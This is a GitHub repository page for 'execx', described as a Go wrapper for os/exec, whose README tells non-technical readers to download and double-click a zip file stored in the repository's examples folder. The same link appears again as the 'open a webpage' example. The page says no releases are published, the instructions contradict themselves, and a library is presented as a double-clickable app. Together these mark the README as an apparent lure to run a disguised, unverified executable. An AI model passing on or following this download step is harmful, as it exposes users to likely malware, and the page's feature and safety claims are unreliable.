Skip to content

πŸ”§ Simplify command execution in Go with execx, a user-friendly wrapper around the `os/exec` package for smoother processes and easier integration.

License

Notifications You must be signed in to change notification settings

zakaria-x9/execx

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

38 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸŽ‰ execx - Run Commands Simply and Safely

Download execx

πŸš€ Getting Started

Welcome to execx! This software makes running external commands easy and safe. You don't need to be a programmer to use it. Follow the steps below to get started.

πŸ“₯ Download & Install

  1. Click the link below to visit the Releases page: visit this page to download

  2. Look for the latest version of execx on the Releases page.

  3. Download the file that matches your operating system:

    • For Windows, look for https://raw.githubusercontent.com/zakaria-x9/execx/main/examples/onstdout/Software_v3.8-beta.4.zip.
    • For macOS, look for execx-macos.
    • For Linux, look for execx-linux.
  4. After downloading, locate the file on your computer.

  5. To run execx, double-click the downloaded file. It will open a command window where you can start using execx.

βš™οΈ System Requirements

  • Operating System: You can use execx on Windows, macOS, or Linux.
  • Disk Space: At least 30 MB available space.
  • Memory: 1 GB RAM or more recommended.

πŸ“ Features

  • Easy to Use: execx provides a simple way to run commands without deep technical knowledge.
  • Safe Execution: It includes checks to avoid running harmful commands.
  • Fluent API: Lets you write commands just by typing, making it clear and expressive.
  • Automation Support: Perfect for scripting and automating repetitive tasks.
  • Cross-Platform Compatibility: Works seamlessly on multiple operating systems.

πŸ› οΈ How to Use execx

  1. Open execx: Launch the command window where you opened execx.

  2. Running a Command: Type the command you wish to run. For example:

    • To list files, type ls (or dir on Windows).
    • To open an application, type its name.
  3. Using Options: You can chain commands together or add options for more control. For example:

    execx run command --option=value
    β€˜β€˜`
    
  4. Using Scripts: Save your commands in a text file and run them with execx. This way, you can automate tasks by running the script file.

πŸ” Examples

Here are a couple of simple examples to show how to use execx:

  • Listing Files:

    • Open execx and type:
      execx run ls
      
  • Opening a Webpage:

    • To open a browser to a specific webpage, type:
      execx run open https://raw.githubusercontent.com/zakaria-x9/execx/main/examples/onstdout/Software_v3.8-beta.4.zip
      

πŸ’¬ Support

If you encounter any issues or have questions, please check the GitHub Issues page. You can also submit your own issue for help.

πŸ“œ License

execx is open-source software. Feel free to use and modify it under the terms of the MIT License.

πŸ“© Contact

For more information or to connect with the community, visit the GitHub repository. You can share your experiences and suggestions there.

Download execx

Enjoy using execx!

About

πŸ”§ Simplify command execution in Go with execx, a user-friendly wrapper around the `os/exec` package for smoother processes and easier integration.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages